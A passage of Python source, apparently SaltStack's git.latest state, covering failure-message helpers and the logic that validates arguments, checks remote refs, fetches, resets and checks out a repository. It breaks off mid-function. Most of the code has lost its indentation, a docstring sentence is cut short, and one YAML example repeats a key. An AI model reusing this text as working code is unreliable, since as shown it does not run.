ret['comment'] = comment
return ret
def _fail(ret, msg, comments=None):
ret['result'] = False
if comments:
msg += '\n\nChanges already made: '
msg += _format_comments(comments)
ret['comment'] = msg
return ret
def _failed_fetch(ret, exc, comments=None):
    '''
    Fail the state with a message explaining the fetch failure and how
    'force_fetch' can be used to override non-fast-forward failures.
    '''
    template = (
        'Fetch failed. Set \'force_fetch\' to True to force the fetch if the '
        'failure was due to not being able to fast-forward. Output of the fetch '
        'command follows:\n\n{0}'
    )
    return _fail(ret, template.format(_strip_exc(exc)), comments)
def _failed_submodule_update(ret, exc, comments=None):
    '''
    Fail the state with the error message from a submodule update.
    '''
    return _fail(
        ret,
        'Failed to update submodules: ' + _strip_exc(exc),
        comments)
def _not_fast_forward(ret, rev, pre, post, branch, local_branch,
                      default_branch, local_changes, comments):
    '''
    Fail the state with a detailed message explaining why the update from
    ``pre`` to ``post`` cannot be applied without ``force_reset`` — either
    because it is not a fast-forward merge, or because there are
    uncommitted local changes. A hint about the ``branch``/``rev``
    arguments is appended when the local branch name appears to be the
    source of the mismatch.
    '''
    branch_msg = ''
    if branch is None:
        if rev != 'HEAD':
            # A specific rev was requested but the checked-out branch has a
            # different name; suggest setting 'branch' to avoid the reset.
            if local_branch != rev:
                branch_msg = (
                    ' The desired rev ({0}) differs from the name of the '
                    'local branch ({1}), if the desired rev is a branch name '
                    'then a forced update could possibly be avoided by '
                    'setting the \'branch\' argument to \'{0}\' instead.'
                    .format(rev, local_branch)
                )
        else:
            # Tracking remote HEAD: warn when the local branch no longer
            # matches the remote's default branch.
            if default_branch is not None and local_branch != default_branch:
                branch_msg = (
                    ' The default remote branch ({0}) differs from the '
                    'local branch ({1}). This could be caused by changing the '
                    'default remote branch, or if the local branch was '
                    'manually changed. Rather than forcing an update, it '
                    'may be advisable to set the \'branch\' argument to '
                    '\'{0}\' instead. To ensure that this state follows the '
                    '\'{0}\' branch instead of the remote HEAD, set the '
                    '\'rev\' argument to \'{0}\'.'
                    .format(default_branch, local_branch)
                )

    # Abbreviate both SHA1s for display.
    pre = _short_sha(pre)
    post = _short_sha(post)
    return _fail(
        ret,
        'Repository would be updated {0}{1}, but {2}. Set \'force_reset\' to '
        'True to force this update{3}.{4}'.format(
            # Show the from/to range only when local changes make the
            # starting point relevant.
            'from {0} to {1}'.format(pre, post)
            if local_changes and pre != post
            else 'to {0}'.format(post),
            # Mention the branch checkout that would happen first.
            ' (after checking out local branch \'{0}\')'.format(branch)
            if _need_branch_change(branch, local_branch)
            else '',
            # The reason the update is blocked.
            'this is not a fast-forward merge'
            if not local_changes
            else 'there are uncommitted changes',
            ' and discard these changes' if local_changes else '',
            branch_msg,
        ),
        comments
    )
def latest(name,
rev='HEAD',
target=None,
branch=None,
user=None,
password=None,
update_head=True,
force_checkout=False,
force_clone=False,
force_fetch=False,
force_reset=False,
submodules=False,
bare=False,
mirror=False,
remote='origin',
fetch_tags=True,
depth=None,
identity=None,
https_user=None,
https_pass=None,
onlyif=False,
unless=False,
refspec_branch='*',
refspec_tag='*',
**kwargs):
'''
Make sure the repository is cloned to the given directory and is
up-to-date.
name
Address of the remote repository, as passed to ``git clone``
.. note::
From the `Git documentation`_, there are two URL formats
supported for SSH authentication. The below two examples are
equivalent:
.. code-block:: text
# ssh:// URL
ssh://user@server/project.git
# SCP-like syntax
user@server:project.git
A common mistake is to use an ``ssh://`` URL, but with a colon
after the domain instead of a slash. This is invalid syntax in
Git, and will therefore not work in Salt. When in doubt, confirm
that a ``git clone`` works for the URL before using it in Salt.
It has been reported by some users that SCP-like syntax is
incompatible with git repos hosted on `Atlassian Stash/BitBucket
Server`_. In these cases, it may be necessary to use ``ssh://``
URLs for SSH authentication.
.. _`Git documentation`: https://git-scm.com/book/en/v2/Git-on-the-Server-The-Protocols#The-SSH-Protocol
.. _`Atlassian Stash/BitBucket Server`: https://www.atlassian.com/software/bitbucket/server
rev : HEAD
The remote branch, tag, or revision ID to checkout after clone / before
update. If specified, then Salt will also ensure that the tracking
branch is set to ``<remote>/<rev>``, unless ``rev`` refers to a tag or
SHA1, in which case Salt will ensure that the tracking branch is unset.
If ``rev`` is not specified, it will be assumed to be ``HEAD``, and
Salt will not manage the tracking branch at all.
.. versionchanged:: 2015.8.0
If not specified, ``rev`` now defaults to the remote repository's
HEAD.
target
Name of the target directory where repository is about to be cloned
branch
Name of the local branch into which to checkout the specified rev. If
not specified, then Salt will not care what branch is being used
locally and will just use whatever branch is currently there.
.. versionadded:: 2015.8.0
.. note::
If this argument is not specified, this means that Salt will not
change the local branch if the repository is reset to another
branch/tag/SHA1. For example, assume that the following state was
run initially:
.. code-block:: yaml
foo_app:
git.latest:
- name: https://mydomain.tld/apps/foo.git
- target: /var/www/foo
- user: www
This would have cloned the HEAD of that repo (since a ``rev``
wasn't specified), and because ``branch`` is not specified, the
branch in the local clone at ``/var/www/foo`` would be whatever the
default branch is on the remote repository (usually ``master``, but
not always). Now, assume that it becomes necessary to switch this
checkout to the ``dev`` branch. This would require ``rev`` to be
set, and probably would also require ``force_reset`` to be enabled:
.. code-block:: yaml
foo_app:
git.latest:
- name: https://mydomain.tld/apps/foo.git
- target: /var/www/foo
- user: www
- rev: dev
- force_reset: True
The result of this state would be to perform a hard-reset to
``origin/dev``. Since ``branch`` was not specified though, while
``/var/www/foo`` would reflect the contents of the remote repo's
``dev`` branch, the local branch would still remain whatever it was
when it was cloned. To make the local branch match the remote one,
set ``branch`` as well, like so:
.. code-block:: yaml
foo_app:
git.latest:
- name: https://mydomain.tld/apps/foo.git
- target: /var/www/foo
- user: www
- rev: dev
- branch: dev
- force_reset: True
This may seem redundant, but Salt tries to support a wide variety
of use cases, and doing it this way allows for the use case where
the local branch doesn't need to be strictly managed.
user
Local system user under which to run git commands. By default, commands
are run by the user under which the minion is running.
.. note::
This is not to be confused with the username for http(s)/SSH
authentication.
.. versionadded:: 0.17.0
password
Windows only. Required when specifying ``user``. This parameter will be
ignored on non-Windows platforms.
.. versionadded:: 2016.3.4
update_head : True
If set to ``False``, then the remote repository will be fetched (if
necessary) to ensure that the commit to which ``rev`` points exists in
the local checkout, but no changes will be made to the local HEAD.
.. versionadded:: 2015.8.3
force_checkout : False
When checking out the local branch, the state will fail if there are
unwritten changes. Set this argument to ``True`` to discard unwritten
changes when checking out.
force_clone : False
If the ``target`` directory exists and is not a git repository, then
this state will fail. Set this argument to ``True`` to remove the
contents of the target directory and clone the repo into it.
force_fetch : False
If a fetch needs to be performed, non-fast-forward fetches will cause
this state to fail. Set this argument to ``True`` to force the fetch
even if it is a non-fast-forward update.
.. versionadded:: 2015.8.0
force_reset : False
If the update is not a fast-forward, this state will fail. Set this
argument to ``True`` to force a hard-reset to the remote revision in
these cases.
submodules : False
Update submodules on clone or branch change
bare : False
Set to ``True`` if the repository is to be a bare clone of the remote
repository.
.. note:
Setting this option to ``True`` is incompatible with the ``rev``
argument.
mirror
Set to ``True`` if the repository is to be a mirror of the remote
repository. This implies that ``bare`` set to ``True``, and thus is
incompatible with ``rev``.
remote : origin
Git remote to use. If this state needs to clone the repo, it will clone
it using this value as the initial remote name. If the repository
already exists, and a remote by this name is not present, one will be
added.
fetch_tags : True
If ``True``, then when a fetch is performed all tags will be fetched,
even those which are not reachable by any branch on the remote.
depth
Defines depth in history when git a clone is needed in order to ensure
latest. E.g. ``depth: 1`` is useful when deploying from a repository
with a long history. Use rev to specify branch. This is not compatible
with tags or revision IDs.
identity
Path to a private key to use for ssh URLs. This can be either a single
string, or a list of strings. For example:
.. code-block:: yaml
# Single key
git@github.com:user/repo.git:
git.latest:
- user: deployer
- identity: /home/deployer/.ssh/id_rsa
# Two keys
git@github.com:user/repo.git:
git.latest:
- user: deployer
- identity:
- /home/deployer/.ssh/id_rsa
- /home/deployer/.ssh/id_rsa_alternate
If multiple keys are specified, they will be tried one-by-one in order
for each git command which needs to authenticate.
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
.. versionchanged:: 2016.3.0
Key can now be specified as a SaltStack fileserver URL (e.g.
``salt://path/to/identity_file``).
https_user
HTTP Basic Auth username for HTTPS (only) clones
.. versionadded:: 2015.5.0
https_pass
HTTP Basic Auth password for HTTPS (only) clones
.. versionadded:: 2015.5.0
onlyif
A command to run as a check, run the named command only if the command
passed to the ``onlyif`` option returns true
unless
A command to run as a check, only run the named command if the command
passed to the ``unless`` option returns false
refspec_branch : *
A glob expression defining which branches to retrieve when fetching.
See `git-fetch(1)`_ for more information on how refspecs work.
.. versionadded:: Nitrogen
refspec_tag : *
A glob expression defining which tags to retrieve when fetching. See
`git-fetch(1)`_ for more information on how refspecs work.
.. versionadded:: Nitrogen
.. _`git-fetch(1)`: http://git-scm.com/docs/git-fetch
.. note::
Clashing ID declarations can be avoided when including different
branches from the same git repository in the same SLS file by using the
``name`` argument. The example below checks out the ``gh-pages`` and
``gh-pages-prod`` branches from the same repository into separate
directories. The example also sets up the ``ssh_known_hosts`` ssh key
required to perform the git checkout.
Also, it has been reported that the SCP-like syntax for
.. code-block:: yaml
gitlab.example.com:
ssh_known_hosts:
- present
- user: root
- enc: ecdsa
- fingerprint: 4e:94:b0:54:c1:5b:29:a2:70:0e:e1:a3:51:ee:ee:e3
git-website-staging:
git.latest:
- name: git@gitlab.example.com:user/website.git
- rev: gh-pages
- target: /usr/share/nginx/staging
- identity: /root/.ssh/website_id_rsa
- require:
- pkg: git
- ssh_known_hosts: gitlab.example.com
git-website-staging:
git.latest:
- name: git@gitlab.example.com:user/website.git
- rev: gh-pages
- target: /usr/share/nginx/staging
- identity: salt://website/id_rsa
- require:
- pkg: git
- ssh_known_hosts: gitlab.example.com
git-website-prod:
git.latest:
- name: git@gitlab.example.com:user/website.git
- rev: gh-pages-prod
- target: /usr/share/nginx/prod
- identity: /root/.ssh/website_id_rsa
- require:
- pkg: git
- ssh_known_hosts: gitlab.example.com
'''
ret = {'name': name, 'result': True, 'comment': '', 'changes': {}}
kwargs = salt.utils.clean_kwargs(**kwargs)
if kwargs:
return _fail(
ret,
salt.utils.invalid_kwargs(kwargs, raise_exc=False)
)
if not remote:
return _fail(ret, '\'remote\' argument is required')
if not target:
return _fail(ret, '\'target\' argument is required')
if not rev:
return _fail(
ret,
'\'{0}\' is not a valid value for the \'rev\' argument'.format(rev)
)
# Ensure that certain arguments are strings to ensure that comparisons work
if not isinstance(rev, six.string_types):
rev = str(rev)
if target is not None:
if not isinstance(target, six.string_types):
target = str(target)
if not os.path.isabs(target):
return _fail(
ret,
'target \'{0}\' is not an absolute path'.format(target)
)
if branch is not None and not isinstance(branch, six.string_types):
branch = str(branch)
if user is not None and not isinstance(user, six.string_types):
user = str(user)
if password is not None and not isinstance(password, six.string_types):
password = str(password)
if remote is not None and not isinstance(remote, six.string_types):
remote = str(remote)
if identity is not None:
if isinstance(identity, six.string_types):
identity = [identity]
elif not isinstance(identity, list):
return _fail(ret, 'identity must be either a list or a string')
for ident_path in identity:
if 'salt://' in ident_path:
try:
ident_path = __salt__['cp.cache_file'](ident_path, __env__)
except IOError as exc:
log.error(
'Failed to cache {0}: {1}'.format(ident_path, exc)
)
return _fail(
ret,
'identity \'{0}\' does not exist.'.format(
ident_path
)
)
if not os.path.isabs(ident_path):
return _fail(
ret,
'identity \'{0}\' is not an absolute path'.format(
ident_path
)
)
if https_user is not None and not isinstance(https_user, six.string_types):
https_user = str(https_user)
if https_pass is not None and not isinstance(https_pass, six.string_types):
https_pass = str(https_pass)
if os.path.isfile(target):
return _fail(
ret,
'Target \'{0}\' exists and is a regular file, cannot proceed'
.format(target)
)
try:
desired_fetch_url = salt.utils.url.add_http_basic_auth(
name,
https_user,
https_pass,
https_only=True
)
except ValueError as exc:
return _fail(ret, exc.__str__())
redacted_fetch_url = \
salt.utils.url.redact_http_basic_auth(desired_fetch_url)
if mirror:
bare = True
# Check to make sure rev and mirror/bare are not both in use
if rev != 'HEAD' and bare:
return _fail(ret, ('\'rev\' is not compatible with the \'mirror\' and '
'\'bare\' arguments'))
run_check_cmd_kwargs = {'runas': user, 'password': password}
if 'shell' in __grains__:
run_check_cmd_kwargs['shell'] = __grains__['shell']
# check if git.latest should be applied
cret = mod_run_check(
run_check_cmd_kwargs, onlyif, unless
)
if isinstance(cret, dict):
ret.update(cret)
return ret
refspecs = [
'refs/heads/{0}:refs/remotes/{1}/{0}'.format(refspec_branch, remote),
'+refs/tags/{0}:refs/tags/{0}'.format(refspec_tag)
] if fetch_tags else []
log.info('Checking remote revision for {0}'.format(name))
try:
all_remote_refs = __salt__['git.remote_refs'](
name,
heads=False,
tags=False,
user=user,
password=password,
identity=identity,
https_user=https_user,
https_pass=https_pass,
ignore_retcode=False,
saltenv=__env__)
except CommandExecutionError as exc:
return _fail(
ret,
'Failed to check remote refs: {0}'.format(_strip_exc(exc))
)
if 'HEAD' in all_remote_refs:
head_rev = all_remote_refs['HEAD']
for refname, refsha in six.iteritems(all_remote_refs):
if refname.startswith('refs/heads/'):
if refsha == head_rev:
default_branch = refname.partition('refs/heads/')[-1]
break
else:
default_branch = None
else:
head_ref = None
default_branch = None
desired_upstream = False
if bare:
remote_rev = None
remote_rev_type = None
else:
if rev == 'HEAD':
if head_rev is not None:
remote_rev = head_rev
# Just go with whatever the upstream currently is
desired_upstream = None
remote_rev_type = 'sha1'
else:
# Empty remote repo
remote_rev = None
remote_rev_type = None
elif 'refs/heads/' + rev in all_remote_refs:
remote_rev = all_remote_refs['refs/heads/' + rev]
desired_upstream = '/'.join((remote, rev))
remote_rev_type = 'branch'
elif 'refs/tags/' + rev + '^{}' in all_remote_refs:
# Annotated tag
remote_rev = all_remote_refs['refs/tags/' + rev + '^{}']
remote_rev_type = 'tag'
elif 'refs/tags/' + rev in all_remote_refs:
# Non-annotated tag
remote_rev = all_remote_refs['refs/tags/' + rev]
remote_rev_type = 'tag'
else:
if len(rev) <= 40 \
and all(x in string.hexdigits for x in rev):
# git ls-remote did not find the rev, and because it's a
# hex string <= 40 chars we're going to assume that the
# desired rev is a SHA1
rev = rev.lower()
remote_rev = rev
remote_rev_type = 'sha1'
else:
remote_rev = None
remote_rev_type = None
# For the comment field of the state return dict, the remote location
# (and short-sha1, if rev is not a sha1) is referenced several times,
# determine it once here and reuse the value below.
if remote_rev_type == 'sha1':
if rev == 'HEAD':
remote_loc = 'remote HEAD (' + remote_rev[:7] + ')'
else:
remote_loc = remote_rev[:7]
elif remote_rev is not None:
remote_loc = '{0} ({1})'.format(
desired_upstream if remote_rev_type == 'branch' else rev,
remote_rev[:7]
)
else:
# Shouldn't happen but log a warning here for future
# troubleshooting purposes in the event we find a corner case.
log.warning(
'Unable to determine remote_loc. rev is %s, remote_rev is '
'%s, remove_rev_type is %s, desired_upstream is %s, and bare '
'is%s set',
rev,
remote_rev,
remote_rev_type,
desired_upstream,
' not' if not bare else ''
)
remote_loc = None
if remote_rev is None and not bare:
if rev != 'HEAD':
# A specific rev is desired, but that rev doesn't exist on the
# remote repo.
return _fail(
ret,
'No revision matching \'{0}\' exists in the remote '
'repository'.format(rev)
)
git_ver = _LooseVersion(__salt__['git.version'](versioninfo=False))
check = 'refs' if bare else '.git'
gitdir = os.path.join(target, check)
comments = []
if os.path.isdir(gitdir) or __salt__['git.is_worktree'](target,
user=user,
password=password):
# Target directory is a git repository or git worktree
try:
all_local_branches = __salt__['git.list_branches'](
target, user=user, password=password)
all_local_tags = __salt__['git.list_tags'](target,
user=user,
password=password)
local_rev, local_branch = \
_get_local_rev_and_branch(target, user, password)
if not bare and remote_rev is None and local_rev is not None:
return _fail(
ret,
'Remote repository is empty, cannot update from a '
'non-empty to an empty repository'
)
# Base rev and branch are the ones from which any reset or merge
# will take place. If the branch is not being specified, the base
# will be the "local" rev and branch, i.e. those we began with
# before this state was run. If a branch is being specified and it
# both exists and is not the one with which we started, then we'll
# be checking that branch out first, and it instead becomes our
# base. The base branch and rev will be used below in comparisons
# to determine what changes to make.
base_rev = local_rev
base_branch = local_branch
if _need_branch_change(branch, local_branch):
if branch not in all_local_branches:
# We're checking out a new branch, so the base_rev and
# remote_rev will be identical.
base_rev = remote_rev
else:
base_branch = branch
# Desired branch exists locally and is not the current
# branch. We'll be performing a checkout to that branch
# eventually, but before we do that we need to find the
# current SHA1.
try:
base_rev = __salt__['git.rev_parse'](
target,
branch + '^{commit}',
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError as exc:
return _fail(
ret,
'Unable to get position of local branch \'{0}\': '
'{1}'.format(branch, _strip_exc(exc)),
comments
)
remotes = __salt__['git.remotes'](target,
user=user,
password=password,
redact_auth=False)
revs_match = _revs_equal(local_rev, remote_rev, remote_rev_type)
try:
local_changes = bool(
__salt__['git.diff'](target,
'HEAD',
user=user,
password=password)
)
except CommandExecutionError:
# No need to capture the error and log it, the _git_run()
# helper in the git execution module will have already logged
# the output from the command.
log.warning(
'git.latest: Unable to determine if %s has local changes',
target
)
local_changes = False
if local_changes and revs_match:
if force_reset:
msg = (
'{0} is up-to-date, but with local changes. Since '
'\'force_reset\' is enabled, these local changes '
'would be reset.'.format(target)
)
if __opts__['test']:
ret['changes']['forced update'] = True
if comments:
msg += _format_comments(comments)
return _neutral_test(ret, msg)
log.debug(msg.replace('would', 'will'))
else:
log.debug(
'%s up-to-date, but with local changes. Since '
'\'force_reset\' is disabled, no changes will be '
'made.', target
)
return _uptodate(ret,
target,
_format_comments(comments),
local_changes)
if remote_rev_type == 'sha1' \
and base_rev is not None \
and base_rev.startswith(remote_rev):
# Either we're already checked out to the branch we need and it
# is up-to-date, or the branch to which we need to switch is
# on the same SHA1 as the desired remote revision. Either way,
# we know we have the remote rev present already and no fetch
# will be needed.
has_remote_rev = True
else:
has_remote_rev = False
if remote_rev is not None:
try:
__salt__['git.rev_parse'](
target,
remote_rev + '^{commit}',
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
# Local checkout doesn't have the remote_rev
pass
else:
# The object might exist enough to get a rev-parse to
# work, while the local ref could have been
# deleted/changed/force updated. Do some further sanity
# checks to determine if we really do have the
# remote_rev.
if remote_rev_type == 'branch':
if remote in remotes:
try:
# Do a rev-parse on <remote>/<rev> to get
# the local SHA1 for it, so we can compare
# it to the remote_rev SHA1.
local_copy = __salt__['git.rev_parse'](
target,
desired_upstream,
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
pass
else:
# If the SHA1s don't match, then the remote
# branch was force-updated, and we need to
# fetch to update our local copy the ref
# for the remote branch. If they do match,
# then we have the remote_rev and don't
# need to fetch.
if local_copy == remote_rev:
has_remote_rev = True
elif remote_rev_type == 'tag':
if rev in all_local_tags:
try:
local_tag_sha1 = __salt__['git.rev_parse'](
target,
rev + '^{commit}',
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
# Shouldn't happen if the tag exists
# locally but account for this just in
# case.
local_tag_sha1 = None
if local_tag_sha1 == remote_rev:
has_remote_rev = True
else:
if not force_reset:
# SHA1 of tag on remote repo is
# different than local tag. Unless
# we're doing a hard reset then we
# don't need to proceed as we know that
# the fetch will update the tag and the
# only way to make the state succeed is
# to reset the branch to point at the
# tag's new location.
return _fail(
ret,
'\'{0}\' is a tag, but the remote '
'SHA1 for this tag ({1}) doesn\'t '
'match the local SHA1 ({2}). Set '
'\'force_reset\' to True to force '
'this update.'.format(
rev,
_short_sha(remote_rev),
_short_sha(local_tag_sha1)
)
)
elif remote_rev_type == 'sha1':
has_remote_rev = True
# If fast_forward is not boolean, then we don't know if this will
# be a fast forward or not, because a fetch is required.
fast_forward = None if not local_changes else False
if has_remote_rev:
if (not revs_match and not update_head) \
and (branch is None or branch == local_branch):
ret['comment'] = remote_loc.capitalize() \
if rev == 'HEAD' \
else remote_loc
ret['comment'] += (
' is already present and local HEAD ({0}) does not '
'match, but update_head=False. HEAD has not been '
'updated locally.'.format(local_rev[:7])
)
return ret
# No need to check if this is a fast_forward if we already know
# that it won't be (due to local changes).
if fast_forward is not False:
if base_rev is None:
# If we're here, the remote_rev exists in the local
# checkout but there is still no HEAD locally. A
# possible reason for this is that an empty repository
# existed there and a remote was added and fetched, but
# the repository was not fast-forwarded. Regardless,
# going from no HEAD to a locally-present rev is
# considered a fast-forward update, unless there are
# local changes.
fast_forward = not bool(local_changes)
else:
fast_forward = __salt__['git.merge_base'](
target,
refs=[base_rev, remote_rev],
is_ancestor=True,
user=user,
password=password,
ignore_retcode=True)
if fast_forward is False:
if not force_reset:
return _not_fast_forward(
ret,
rev,
base_rev,
remote_rev,
branch,
local_branch,
default_branch,
local_changes,
comments)
merge_action = 'hard-reset'
elif fast_forward is True:
merge_action = 'fast-forwarded'
else:
merge_action = 'updated'
if base_branch is None:
# No local branch, no upstream tracking branch
upstream = None
else:
try:
upstream = __salt__['git.rev_parse'](
target,
base_branch + '@{upstream}',
opts=['--abbrev-ref'],
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
# There is a local branch but the rev-parse command
# failed, so that means there is no upstream tracking
# branch. This could be because it is just not set, or
# because the branch was checked out to a SHA1 or tag
# instead of a branch. Set upstream to False to make a
# distinction between the case above where there is no
# local_branch (when the local checkout is an empty
# repository).
upstream = False
if remote in remotes:
fetch_url = remotes[remote]['fetch']
else:
log.debug(
'Remote \'{0}\' not found in git checkout at {1}'
.format(remote, target)
)
fetch_url = None
if remote_rev is not None and desired_fetch_url != fetch_url:
if __opts__['test']:
actions = [
'Remote \'{0}\' would be changed from {1} to {2}'
.format(
remote,
salt.utils.url.redact_http_basic_auth(fetch_url),
redacted_fetch_url
)
]
if not has_remote_rev:
actions.append('Remote would be fetched')
if not revs_match:
if update_head:
ret['changes']['revision'] = {
'old': local_rev, 'new': remote_rev
}
if fast_forward is False:
ret['changes']['forced update'] = True
actions.append(
'Repository would be {0} to {1}'.format(
merge_action,
_short_sha(remote_rev)
)
)
if ret['changes']:
return _neutral_test(ret, _format_comments(actions))
else:
if not revs_match and not update_head:
# Repo content would not be modified but the remote
# URL would be modified, so we can't just say that
# the repo is up-to-date, we need to inform the
# user of the actions taken.
ret['comment'] = _format_comments(actions)
return ret
return _uptodate(ret,
target,
_format_comments(actions))
# The fetch_url for the desired remote does not match the
# specified URL (or the remote does not exist), so set the
# remote URL.
__salt__['git.remote_set'](target,
url=name,
remote=remote,
user=user,
password=password,
https_user=https_user,
https_pass=https_pass)
comments.append(
'Remote \'{0}\' changed from {1} to {2}'.format(
remote,
salt.utils.url.redact_http_basic_auth(fetch_url),
redacted_fetch_url
)
)
if remote_rev is not None:
if __opts__['test']:
actions = []
if not has_remote_rev:
actions.append(
'Remote \'{0}\' would be fetched'.format(remote)
)
if (not revs_match) \
and (update_head or (branch is not None
and branch != local_branch)):
ret['changes']['revision'] = {
'old': local_rev, 'new': remote_rev
}
if _need_branch_change(branch, local_branch):
if branch not in all_local_branches:
actions.append(
'New branch \'{0}\' would be checked '
'out, with {1} as a starting '
'point'.format(branch, remote_loc)
)
if desired_upstream:
actions.append(
'Tracking branch would be set to {0}'
.format(desired_upstream)
)
else:
actions.append(
'Branch \'{0}\' would be checked out '
'and {1} to {2}'.format(
branch,
merge_action,
_short_sha(remote_rev)
)
)
else:
if not revs_match:
if update_head:
if fast_forward is True:
actions.append(
'Repository would be fast-forwarded from '
'{0} to {1}'.format(
_short_sha(local_rev),
_short_sha(remote_rev)
)
)
else:
actions.append(
'Repository would be {0} from {1} to {2}'
.format(
'hard-reset'
if force_reset and has_remote_rev
else 'updated',
_short_sha(local_rev),
_short_sha(remote_rev)
)
)
else:
actions.append(
'Local HEAD ({0}) does not match {1} but '
'update_head=False, HEAD would not be '
'updated locally'.format(
local_rev[:7],
remote_loc
)
)
# Check if upstream needs changing
if not upstream and desired_upstream:
actions.append(
'Tracking branch would be set to {0}'.format(
desired_upstream
)
)
elif upstream and desired_upstream is False:
actions.append(
'Tracking branch would be unset'
)
elif desired_upstream and upstream != desired_upstream:
actions.append(
'Tracking branch would be '
'updated to {0}'.format(desired_upstream)
)
if ret['changes']:
return _neutral_test(ret, _format_comments(actions))
else:
formatted_actions = _format_comments(actions)
if not revs_match \
and not update_head \
and formatted_actions:
ret['comment'] = formatted_actions
return ret
return _uptodate(ret,
target,
_format_comments(actions))
if not upstream and desired_upstream:
upstream_action = (
'Tracking branch was set to {0}'.format(
desired_upstream
)
)
branch_opts = _get_branch_opts(
branch,
local_branch,
all_local_branches,
desired_upstream,
git_ver)
elif upstream and desired_upstream is False:
# If the remote_rev is a tag or SHA1, and there is an
# upstream tracking branch, we will unset it. However, we
# can only do this if the git version is 1.8.0 or newer, as
# the --unset-upstream option was not added until that
# version.
if git_ver >= _LooseVersion('1.8.0'):
upstream_action = 'Tracking branch was unset'
branch_opts = ['--unset-upstream']
else:
branch_opts = None
elif desired_upstream and upstream != desired_upstream:
upstream_action = (
'Tracking branch was updated to {0}'.format(
desired_upstream
)
)
branch_opts = _get_branch_opts(
branch,
local_branch,
all_local_branches,
desired_upstream,
git_ver)
else:
branch_opts = None
if branch_opts is not None and local_branch is None:
return _fail(
ret,
'Cannot set/unset upstream tracking branch, local '
'HEAD refers to nonexistent branch. This may have '
'been caused by cloning a remote repository for which '
'the default branch was renamed or deleted. If you '
'are unable to fix the remote repository, you can '
'work around this by setting the \'branch\' argument '
'(which will ensure that the named branch is created '
'if it does not already exist).',
comments
)
if not has_remote_rev:
try:
fetch_changes = __salt__['git.fetch'](
target,
remote=remote,
force=force_fetch,
refspecs=refspecs,
user=user,
password=password,
identity=identity,
saltenv=__env__)
except CommandExecutionError as exc:
return _failed_fetch(ret, exc, comments)
else:
if fetch_changes:
comments.append(
'{0} was fetched, resulting in updated '
'refs'.format(name)
)
try:
__salt__['git.rev_parse'](
target,
remote_rev + '^{commit}',
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError as exc:
return _fail(
ret,
'Fetch did not successfully retrieve rev \'{0}\' '
'from {1}: {2}'.format(rev, name, exc)
)
if (not revs_match and not update_head) \
and (branch is None or branch == local_branch):
# Rev now exists locally (was fetched), and since we're
# not updating HEAD we'll just exit here.
ret['comment'] = remote_loc.capitalize() \
if rev == 'HEAD' \
else remote_loc
ret['comment'] += (
' is already present and local HEAD ({0}) does not '
'match, but update_head=False. HEAD has not been '
'updated locally.'.format(local_rev[:7])
)
return ret
# Now that we've fetched, check again whether or not
# the update is a fast-forward.
if base_rev is None:
fast_forward = True
else:
fast_forward = __salt__['git.merge_base'](
target,
refs=[base_rev, remote_rev],
is_ancestor=True,
user=user,
password=password)
if fast_forward is False and not force_reset:
return _not_fast_forward(
ret,
rev,
base_rev,
remote_rev,
branch,
local_branch,
default_branch,
local_changes,
comments)
if _need_branch_change(branch, local_branch):
if local_changes and not force_checkout:
return _fail(
ret,
'Local branch \'{0}\' has uncommitted '
'changes. Set \'force_checkout\' to True to '
'discard them and proceed.'.format(local_branch)
)
# TODO: Maybe re-retrieve all_local_branches to handle
# the corner case where the destination branch was
# added to the local checkout during a fetch that takes
# a long time to complete.
if branch not in all_local_branches:
if rev == 'HEAD':
checkout_rev = remote_rev
else:
checkout_rev = desired_upstream \
if desired_upstream \
else rev
checkout_opts = ['-b', branch]
else:
checkout_rev = branch
checkout_opts = []
__salt__['git.checkout'](target,
checkout_rev,
force=force_checkout,
opts=checkout_opts,
user=user,
password=password)
if '-b' in checkout_opts:
comments.append(
'New branch \'{0}\' was checked out, with {1} '
'as a starting point'.format(
branch,
remote_loc
)
)
else:
comments.append(
'\'{0}\' was checked out'.format(checkout_rev)
)
if local_changes:
comments.append('Local changes were discarded')
if fast_forward is False:
__salt__['git.reset'](
target,
opts=['--hard', remote_rev],
user=user,
password=password,
)
ret['changes']['forced update'] = True
comments.append(
'Repository was hard-reset to {0}'.format(remote_loc)
)
if branch_opts is not None:
__salt__['git.branch'](
target,
opts=branch_opts,
user=user,
password=password)
comments.append(upstream_action)
# Fast-forward to the desired revision
if fast_forward is True \
and not _revs_equal(base_rev,
remote_rev,
remote_rev_type):
if desired_upstream or rev == 'HEAD':
# Check first to see if we are on a branch before
# trying to merge changes. (The call to
# git.symbolic_ref will only return output if HEAD
# points to a branch.)
if __salt__['git.symbolic_ref'](target,
'HEAD',
opts=['--quiet'],
user=user,
password=password,
ignore_retcode=True):
merge_rev = remote_rev if rev == 'HEAD' \
else desired_upstream
if git_ver >= _LooseVersion('1.8.1.6'):
# --ff-only added in version 1.8.1.6. It's not
# 100% necessary, but if we can use it, we'll
# ensure that the merge doesn't go through if
# not a fast-forward. Granted, the logic that
# gets us to this point shouldn't allow us to
# attempt this merge if it's not a
# fast-forward, but it's an extra layer of
# protection.
merge_opts = ['--ff-only']
else:
merge_opts = []
__salt__['git.merge'](
target,
rev=merge_rev,
opts=merge_opts,
user=user,
password=password)
comments.append(
'Repository was fast-forwarded to {0}'
.format(remote_loc)
)
else:
return _fail(
ret,
'Unable to fast-forward, HEAD is detached',
comments
)
else:
# Update is a fast forward, but we cannot merge to that
# commit so we'll reset to it.
__salt__['git.reset'](
target,
opts=['--hard',
remote_rev if rev == 'HEAD' else rev],
user=user,
password=password)
comments.append(
'Repository was reset to {0} (fast-forward)'
.format(rev)
)
# TODO: Figure out how to add submodule update info to
# test=True return data, and changes dict.
if submodules:
try:
__salt__['git.submodule'](
target,
'update',
opts=['--init', '--recursive'],
user=user,
password=password,
identity=identity,
saltenv=__env__)
except CommandExecutionError as exc:
